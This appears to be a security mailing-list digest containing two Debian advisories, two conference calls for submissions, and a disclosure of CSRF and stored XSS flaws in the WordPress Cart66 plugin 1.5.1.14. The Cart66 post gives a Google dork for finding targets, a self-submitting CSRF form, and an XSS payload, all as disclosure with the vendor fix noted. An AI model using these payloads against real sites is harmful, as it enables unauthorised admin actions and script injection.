[SECURITY] [DSA 2778-1] libapache2-mod-fcgid security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2778-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso October 12, 2013 http://www.debian.org/security/faq - - Package: libapache2-mod-fcgid Vulnerability : heap-based buffer overflow Problem type : remote Debian-specific: no CVE ID : CVE-2013-4365 Robert Matthews discovered that the Apache FCGID module, a FastCGI implementation for Apache HTTP Server, fails to perform adequate boundary checks on user-supplied input. This may allow a remote attacker to cause a heap-based buffer overflow, resulting in a denial of service or potentially allowing the execution of arbitrary code. For the oldstable distribution (squeeze), this problem has been fixed in version 1:2.3.6-1+squeeze2. For the stable distribution (wheezy), this problem has been fixed in version 1:2.3.6-1.2+deb7u1. For the unstable distribution (sid), this problem has been fixed in version 1:2.3.9-1. We recommend that you upgrade your libapache2-mod-fcgid packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (GNU/Linux) iQIcBAEBCgAGBQJSWHsQAAoJEAVMuPMTQ89ErSUQAJYBriFZIkIOLf1MqWCBrYdO sg3pLRurqikUwKb+57SSpkAPt8UYWLujUunrb8ONW1K7bOIg4MzW1oJIPYZx95JG eMSLCd4o3BjyF4rXyqw3y8LM+d19DXB1Blhq8BHsl1SA9PHyqDwq7TXX24Oxpfbe TI9OEn/qDekvP2XJJ0kT3y6Ny8I44117d+yaMlDWc0Y56DE2rkHM0Px6wa/IPJ10 6NxuXKbNFzg9L+Pmifuji79N5325JITQmaoqfQeFxcgoVyqwzfW/kzWmRpcQDeqW 4M+Z8XuuEoyCt7qK/qf1i2tbO6nclGCZmMWfz9NyGpsbgHUiW8tlm/KcZZKqKWFb 2QJ2oVXNbEZwDP5ah4iywjeNitu/Ccr+dLVRAr+5QrswW3FUX/zH+mW5pPUNcOWA tt+fnryd0EynVnH25jE5qS5j57iZ8KT+w/cAGUcQWrbrokDjQ5choBcG47XkAhL5 omHJ7pzA9Jol3Dx6gpu+eRJmKTqRBCEclVb3186vCv8gb0hxFmJobWkxCQXxEVN7 GCnD65UHBkJg2j7rDmC/z/1bewMqQYEszqSAY8d2O0gddB881g1ADcThRx7Lk5Er 4i8E413umowNT0oMvqKxhnXVTYVIbqXt94ARCEvHH1P/H8ioRwqz5nRX+87LrlWD 2MJ1Sch8sDPeOeFTwLdM =FYJO -END PGP SIGNATURE-
Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
# Exploit Title: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities # Exploit Author:absane # Blog: http://blog.noobroot.com # Discovery date:September 29th 2013 # Vendor notified: September 29th 2013 # Vendor fixed: October 12 2013 # Vendor Homepage: http://cart66.com # Software Link: http://downloads.wordpress.org/plugin/cart66-lite.1.5.1.14.zip # Tested on: Wordpress 3.6.1 # Google-dork: inurl:/wp-content/plugins/cart66 # CVE (CSRF):CVE-2013-5977 # CVE (XSS): CVE-2013-5978 Two vulnerabilities were discovered in the Wordpress plugin Cart66 version 1.5.1.14. Vulnerabilities: 1) CSRF 2) Code Injection VULNERABILITY #1 *** CSRF *** Page affected: http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products Proof of Concept htmlbody form name=csrf_form action=http://192.168.196.135/wordpress/wp-admin/admin.php?page=cart66-products; method=post enctype=multipart/form-data id=products-form input type=hidden name=cart66-action value=save product / input type=hidden name=product[id] value= / input class=long type=hidden name='product[name]' id='product-name' value='absane was here' / input type='hidden' name='product[item_number]' id='product-item_number' value='1337' / input type='hidden' id=product-price name='product[price]' value='13.37' / input type='hidden' id=product-price_description name='product[price_description]' value='LuLz' / input type='hidden' id=product-is_user_price name='product[is_user_price]' value='0' / input type=hidden id=product-min_price name='product[min_price]' value='' / input type=hidden id=product-max_price name='product[max_price]' value='' / input type='hidden' id=product-taxable name='product[taxable]' value='0' input type='hidden' id=product-shipped name='product[shipped]' value='1' input type=hidden id=product-weight name=product[weight] value= / input type=hidden id=product-min_qty name='product[min_quantity]' value='' / input type=hidden id=product-max_qty name='product[max_quantity]' value='' / script type=text/javascriptdocument.csrf_form.submit();/script /body/html VULNERABILITY #2 *** *** Code Injection *** *** Page affected: http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products in the following input fields: * Product name * Price description Proof of Concept In the vulnerable fields add scriptalert(0)/script or any other code. The code is placed directly into the database. Input is not sanatized and the code can be executed in ways that depend on the circumstances. During testing, the theme 'iShop 1.0.0' was used and the PoC JavaScript code was executed when I attempted to add a product or modify an existing product. ][ ]..SOLUTIONS.[ ][ Update to version 1.5.1.15 or greater.
[CISTI'2014]: Call for Workshops
*** CALL for WORKSHOPS ** CISTI'2014 - 9th Iberian Conference on Information Systems and Technologies June 18-21, 2014, Barcelona, Spain http://www.aisti.eu/cisti2014/index.php/en * WORKSHOP FORMAT The Iberian Information Systems and Technologies research and industrial community is invited to submit proposals of Workshops for CISTI 2014 9th Iberian Conference on Information Systems and Technologies to be held at Barcelona, Spain, June 1821, 2014. Two types of Workshops may be proposed: Regular Workshops and Project Workshops. Regular Workshops should focus on a specific scientific subject on the scope of CISTI 2014 but not directly included on the main conference areas. Each regular workshop will be coordinated by an Organizing Committee composed of, at least, two researchers in the field, preferably from different institutions and different countries. The organizers should create an international Program Committee for the Workshop, with recognized researchers within the specific Workshop scientific area. Each workshop should have at least 10 submissions and 5 accepted papers in order to be conducted at CISTI. Project Workshops are intended to promote the dissemination and facilitate the future exploitation of EU Latin-American and national project results such as EU/FP7, CSIC, FCT, QREN, Fund.Gulbenkian, CYTED, CAPES, CNPq, FINEP and other Projects/funding sources. The results to be disseminated may be preliminary project results (for unfinished projects) or the project final results (for already finished projects). Each project workshop should be directly related to a Project funded in a competitive manner by a National/International Science Organization. The Workshop should be coordinated by an Organizing Committee composed by at least two researchers including the Principal Investigator of the project. Each project Workshop will be entitled to at least a paper on the Conference main proceedings (specific details and distinct configurations for the project workshop should be discussed with the conference Workshop chair). The selection of Workshops will be performed by CISTI 2014 Conference Chairs. Workshops full papers will be published in the conference main proceedings in specific Workshop chapters. Proceedings will be submitted for indexation by ISI Thomson, SCOPUS, INSPEC and EBSCO. Detailed and up-to-date information may be found at CISTI 2014 website http://www.aisti.eu/cisti2014. WORKSHOP ORGANIZATION The Organizing Committee of each Workshop will be responsible for: Producing and distributing the Workshop Call for Papers (CFP); Coordinating the review and selection process for the papers submitted to the Workshop, as Workshop chairs (on the paper submission system installed for all the Workshops); Delivering the final versions of the papers accepted for the Workshop in accordance with the guidelines and deadlines defined by CISTI 2014 organizers; Coordinating and chairing the Workshop sessions at the conference. CISTI 2014 organizers reserve the right to cancel any Workshop if deadlines are missed or if the number of registered attendees is too low to support the costs associated with the Workshop. PROPOSAL CONTENT Regular Workshop proposals should contain the following information: Workshop title; Brief description of the specific scientific scope of the Workshop; List of topics of interest (max 15 topics); Reasons the Workshop should be held within CISTI2014; Name, postal address, phone and email of all the members of the Workshop Organizing Committee; Proposal for the Workshop Program Committee (Names and affiliations). Project Workshop proposals should contain the following information: Workshop title; Project Title, Reference, Principal Investigator, Funding Organization, Total Funding, Consortium, Abstract and Objectives; Reasons the Workshop should be held within CISTI2014; Name, postal address, phone and email of all the members of the Workshop Organizing Committee. Proposals should be submitted electronically by email to cistim...@gmail.com (cc: lpr...@dsi.uminho.pt), in PDF, (in English, Portuguese and Spanish), by November 2, 2013. IMPORTANT DATES Deadline for Workshop proposals: November 2, 2013 Notification of Workshop acceptance: November 9, 2013 Deadline for paper submission: February 22, 2014 Notification of paper acceptance: March 29, 2014 Deadline for final versions and conference registration: April 12, 2014 Deadline for Workshop final papers delivery to CISTI organizers: April 19, 2014 Conference dates: June 18-21, 2014 CHAIR Luis Paulo Reis, University of Minho Regards, CISTI'2014 Team
CFP: Passwords^13 Bergen (Norway), December 2-3 2013
Passwords^13 (PasswordsCon.org) December 2-3, 2013 Bergen, Norway CALL FOR SUBMISSIONS Per Thorsheim, with the support of FRISC (www.frisc.no), the University of Bergen and Stricture Consulting Group, organize PasswordsCon, the fifth edition of a technical conference only devoted to passwords and related authentication methods. Passwords are the most common authentication method on internet services and on computers in general, regardless of their form factor (desktop, laptop, tablet, smartphone, etc.). Dissatisfaction with the robustness and usability of current approaches has motivated the previous editions of the Passwords conference, and more recently prompted the organization of the Password Hashing Competition. The purpose of PasswordsCon is to gather leading researchers in passwords security and authentication methods in general, so as to best understand the challenges posed and to address them adequately. Details on the conference as they are ready will appear at our website: passwordscon.org == TOPICS == PasswordsCon asks for submissions on topics including, but not limited to: - Password hashing functions * New algorithms constructions * Cryptanalytic attacks on classical security notions * Hardness circumvention attacks * Formal definitions and proofs * Implementation on users' platforms * APIs - Attacking password hashes * CPU/GPU coding * Online/offline password guessing and cracking * Distributed attacks * Ruleset generation optimization * Hardware implementation (ASIC, FPGA) * Password profiling of people (patterns, habits) - Passwords security and usability * Empirical studies * Strength metrics * Mobility issues * Policies * Password management software == SUBMISSION INSTRUCTIONS == To submit to PasswordsCon, fill the submission form below, and email it to c...@passwordscon.org Submissions mainly consist of a description of the presentation proposal and of information on the speaker. We do NOT require the submission of a formal original paper. == DATES == October 2- Public CFP October 30 - Submission deadline November 1 - Notification to speakers December 2-3 - PasswordsCon conference == REVIEW PANEL == Submissions with be evaluated by a panel of experts including - Per Thorsheim (chair) - Jean-Philippe Aumasson - Jeremi Gosney --- Submission form PasswordsCon December 2-3, 2013 Bergen, Norway SUBMISSION FORM Please fill out this form completely and email to c...@passwordscon.org If you wish to submit several presentations, please fill different forms for different submissions. == SPEAKER == - Name or handle: - Primary email: - Primary mobile number: If you are accepted we can publish your social media information on the speaker page. If you want your information made public so that attendees can contact you or follow your work, please list it here. - URL: - Twitter handle: - Facebook page: - IRC nickname network: - Bio (Professional history, achievements, bragging points. Let people know who you are, and why you're qualified to speak on this topic.): == PRESENTATION == - Title: - Abstract (max 200 chars): - Details (max 1000 chars): - Is there a demonstration? (Y/N) - Are you releasing a new tool? (Y/N) - How much time does your presentation require? (15, 30, or 60 minutes) - Has this presentation been given in any other venue or conference? (Y/N) Y (no yet, in a week, private conference) - We will provide one LCD projector, a microphone, and an internet connection. Will your presentation require any additional equipment? (Y/N, explain.) - Any special requests for your presentation? == TERMS AND CONDITIONS == By submitting you agree to the Terms and Conditions below. Please read and accept these terms by inserting your name in the appropriate area, otherwise your application will be considered incomplete and returned to you. 1) I warrant that the above work has not been previously published elsewhere, or if it has, that I have obtained permission for its publication, and that I will promptly supply the PasswordsCon committee with wording for crediting the original publication and copyright owner. 2) If I am selected for presentation, I hereby give PasswordsCon permission to duplicate, record and redistribute this presentation; including, but not limited to, the conference proceedings, video, audio, hand outs(s) to the conference attendees for educational, on-line and all other purposes. 3) I will include a detailed bibliography as either a separate document or included within the presentation of all resources cited and/or used in my presentation. 4) I will complete my presentation within the time allocated to me - not running over the time allocation.
[SECURITY] [DSA 2779-1] libxml2 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2779-1 secur...@debian.org http://www.debian.org/security/ Michael Gilbert October 13, 2013 http://www.debian.org/security/faq - - Package: libxml2 Vulnerability : denial of service Problem type : remote Debian-specific: no CVE ID : CVE-2013-2877 Debian Bug : 715531 Aki Helin of OUSPG discovered many out-of-bounds read issues in libxml2, the GNOME project's XML parser library, which can lead to denial of service issues when handling XML documents that end abruptly. For the oldstable distribution (squeeze), this problem has been fixed in version 2.7.8.dfsg-2+squeeze8. For the stable distribution (wheezy), this problem has been fixed in version 2.8.0+dfsg1-7+nmu2. For the testing (jessie) and unstable (sid) distributions (jessie), this problem has been fixed in version 2.9.1+dfsg1-1. We recommend that you upgrade your libxml2 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (GNU/Linux) iQQcBAEBCgAGBQJSWwvIAAoJELjWss0C1vRzHfgf/jxTl96u6ggDXOG/6c4L3/Nn F4I060Lh10lSv+nIEVIxlyCLr+hb/AxqOqPancpLcYxFjphCb9voMnhhxO3MdeWe YOqzeprIXmMkHcy6MFVqwRRXFaF7KFkCfdDu6Xl8r+UQSMlmmg6WApbHZtKosXf3 B8dVwwbfUN/p/Es6BfMCuqxnOEDB+hGOTvxA8Dwj5QnR6gzPEOWzYT/faJKjpTAk z4Ta02FWbslAJYcTxbjyeHsm4z3FVv6ciNFrTExxHBEpSMlBlkkaSqXRO2DHQL4o lbEpvWUu09sjyB7xbVyd6kvytxH+b83NTolUwTxgtZsa7H1admPhVUNtePlBxcYE 3jst61d8UI5mBBpfRKtwaJrA2lA2BeV+vINH/ykNTINv9saVznQ1INRVOdSM0+nO +c89D93tMfBiQWZRvjcWL8wsAQls7AxfMwmUG5ZpIrCyIOEIc7zPRCLhCBO1wX5V kazp4bokjztLhmXXEmLKEOlfp3/aHuSwHeUTigQmZ27MSADcnlIb7Bjcv/zVYUeU A3OPT6PX8GZz+D4FH7A/PP5cs1VKhiPvB5tmuYGsIAKTiQG5Yp9uevGF93TayBhq z823CY39409bdeuvEjtkRzbQiqd2MqRJl1Ms+qrXYVO4AkSuYkT+1UcJPQhim6S1 ICedG1yWy9J3ki4A3iiXhjjnR7UqV4v0ZJbbTH8O4p0ojAaliGwaHMRK/YkdmP6r 1Do8IcJmLHAJfMd2y//HOnYcCliP3EfEJMmTWeUOPd8AlWK5vCWYJ5FOwlW8ID/I BEu4V00O9gtrECeUpKOxz5gT4uqEF5jkVZCZ12HUY3mQ9JcRxQtFSgD6T29QFKk3 CWW1wvVj0pd9CWKvrSSwX88TuNz9vigGUrunrER5CNVrO3ffqqRZo/lCHRPOSSMe Z2A1Xn3zWti55chO1dk4bk8PJISk2/7lKo2h99Ag+JyDZV2VVLoKLeUa7aj2NdJb +cUTCRioFytO3CrFjeHACtXq58SJjojbXiOq+oSMci16ufMKGKbY37bpjQJdyTiD jGsOJzYqS/uCgBil9AZeAAkTBZf101WJ9i9+NnXVSSrghbJzwEEsiMWq5Hnfbs+/ llKBm6rsQUwUXdXFVXeFUcAdVzXjqS0IdMtRrjv6/r925SSI484Zo+itlDMvUZ9/ UXLgzWz7bvcUAkZCb18aUpzWBl3LNixT33/kMV7CZU3ymsZEqB2SvbPKuxW+CyYN qe/MqeBsgHvCmohOgHLeluMPdPZ6NgOK+JI1m201VCGAJ5TusatS2wX9O+nyawj4 Ukhmd4TjW2dSUPjXBLYLYL73+me1M4NuYCChH03gkKYufk2AKDm5ZxvD82GRbNU= =5dBL -END PGP SIGNATURE-